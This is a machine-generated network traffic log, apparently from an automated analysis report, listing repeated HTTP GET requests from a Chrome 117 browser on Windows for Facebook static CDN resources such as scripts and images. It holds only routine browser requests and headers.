    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0,cross/fo219H1KM4T.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yZ/r/YwPTeE82t1h.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y6/r/a2il9m3oo2U.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/OJuPnvrkEfZ.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y-/r/v87V0xuYr4I.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ys/r/4zS6aBDBtHT.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yM/r/7QNyOKeJP6X.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yg/r/5VtnQAqNe99.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ys/r/pg8jih5T_9q.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yn/r/BTuEBPL3Mnd.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y-/r/C5TXdJzIETO.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ye/r/BCReGA2whNu.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i6l24/yP/l/ru_RU/GcN06huceZG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yZ/r/YwPTeE82t1h.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i-G34/yn/l/ru_RU/Td5hkdtkXX5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yn/r/BTuEBPL3Mnd.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yK/r/lNInKxOqejp.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ys/r/pg8jih5T_9q.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ye/r/BCReGA2whNu.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/9NORmZkKZyv.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yT/r/wc_C9ZEewR3.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y8/r/fCWCnWQldVh.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yT/r/DHWoESmf_2P.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yM/r/7QNyOKeJP6X.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y-/r/C5TXdJzIETO.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yg/r/5VtnQAqNe99.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/jJPH6iCu1HH.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yK/r/lNInKxOqejp.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y8/r/fCWCnWQldVh.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y9/r/BTdUGzsTGVy.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yT/r/wc_C9ZEewR3.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yQ/r/WeajZf_EolU.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/9NORmZkKZyv.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yT/r/DHWoESmf_2P.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iKIu4/yy/l/ru_RU/lW1EzoN7_Oc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i-G34/yn/l/ru_RU/Td5hkdtkXX5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/jJPH6iCu1HH.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y2/r/0uUeXNz0Xos.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y9/r/BTdUGzsTGVy.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yQ/r/WeajZf_EolU.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
